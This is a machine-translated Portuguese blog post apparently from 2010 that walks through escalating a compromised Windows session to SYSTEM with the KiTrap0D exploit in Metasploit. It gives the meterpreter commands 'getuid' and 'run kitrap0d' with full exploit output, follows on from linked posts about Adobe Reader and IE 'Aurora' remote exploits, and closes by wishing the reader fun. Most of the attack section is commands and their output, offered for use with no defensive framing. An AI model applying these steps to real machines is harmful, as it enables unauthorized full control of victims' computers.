Categorias:


Traduzir:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Virtual KiTrap0D Oday-DOS para Metasploit:)

01 de fevereiro de 2010 por clshack

Eu já falei sobre este exploit aqui:
[Virtual DOS escalação de privilégios] explorar janelas 2000/XP/VISTA/7/SERVER
O que faz é dar-nos o kernel do sistema de privilégios de uma conta limitada ou um administrador.

Esses dias, eu também falei com duas outras façanhas:


[Ajuda] Exploit-Oday Adobe Reader: Hack Windows com Metasploit

e
Ajuda [Windows] Hack Metasploit com IE e 0 dias aka (Aurora) explora

Estas façanhas nos permitem executar código remotamente no PC da vítima e ganhar os privilégios do usuário está usando o programa vulnerável (por exemplo, Abode Reader 9.)

Neste ponto, se no console Metasploit meterpreter nós tipo:
getuid
teremos uma saída como esta:
meterpreter > getuid
Server username: WINXPSP3\user
Como você vai ver o resultado, isso significa que temos os privilégios do usuário, que poderá ser limitado : (
Então agora entra em jogo que nos dará privilégios KiTrap0D kernel.

Em seguida, digite o console meterpreter:
run kitrap0d
e nós temos essa saída:
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user

[*] Carregando vdmallowed o executável e DLLs do sistema local ...
[*] Envio de vdmallowed C: \ DOCUME ~ 1 \ user \ LOCALS ~ 1 \ Temp pOOiEDDBFzJ.exe \ ...
[*] Envio de vdmallowed C: \ DOCUME ~ 1 \ user \ LOCALS ~ 1 \ Temp vdmexploit.dll \ ...
[*] A escalada nosso processo (PID: 1128) ...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl () - exploits> KiTrap0d Ring0 local
[?] GetVersionEx () => 5,1
[?] NtQuerySystemInformation () => \ WINDOWS \ system32 \ 804D7000 Ntkrnlpa.exe @
[?] Procurando kernel 5.1 assinatura: a versão 2 ...
[+] Trying com índice de assinatura 3
[+] Signature encontrado 0x29142 bytes a partir do kernel base
[+] Iniciando o subsistema NTVDM lançando MS-DOS executável
[?] CreateProcess ("C: \ WINDOWS Twunk_16.exe \") => 1316
[?] OpenProcess (1316) => 0x7e8
[?] Injetando discussão explora no subsistema NTVDM @ 0x7e8
[?] WriteProcessMemory (0x7e8, 0x2070000, VDMEXPLOIT.DLL ", 14);
[?] WaitForSingleObject (0x7cc Infiniti);
[?] GetExitCodeThread (0x7cc, 0012FF44) => 0x77303074
[+] A discussão explora exploração relatórios foi concluído com êxito
[+ W00t]! Agora você pode usar o shell aberto anteriores

[*] Excluindo arquivos ...
[*] Agora funcionando como NT AUTHORITY \ SYSTEM

Agora digite novamente:
getuid
e aqui está o resultado:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Olá boa diversão :)

Outros:

  1. [Ajuda] Exploit-Oday Adobe Reader: Hack Windows com Metasploit
  2. Hack Windows com IE Metasploit e 0 dias aka (Aurora) explora
  3. IE 07/06 EXPLOIT execução remota de código XML com Metasploit
  4. Metasploit 3.4 e Metasploitable
  5. [Metasploit] Abrir uma sessão VNC:)
Tags: , , , , ,
Postado em GNU / Linux , Hacking , Software | No Comments »
"
"
Você pode deixar uma resposta , ou trackback de seu próprio site.

Adicionar um comentário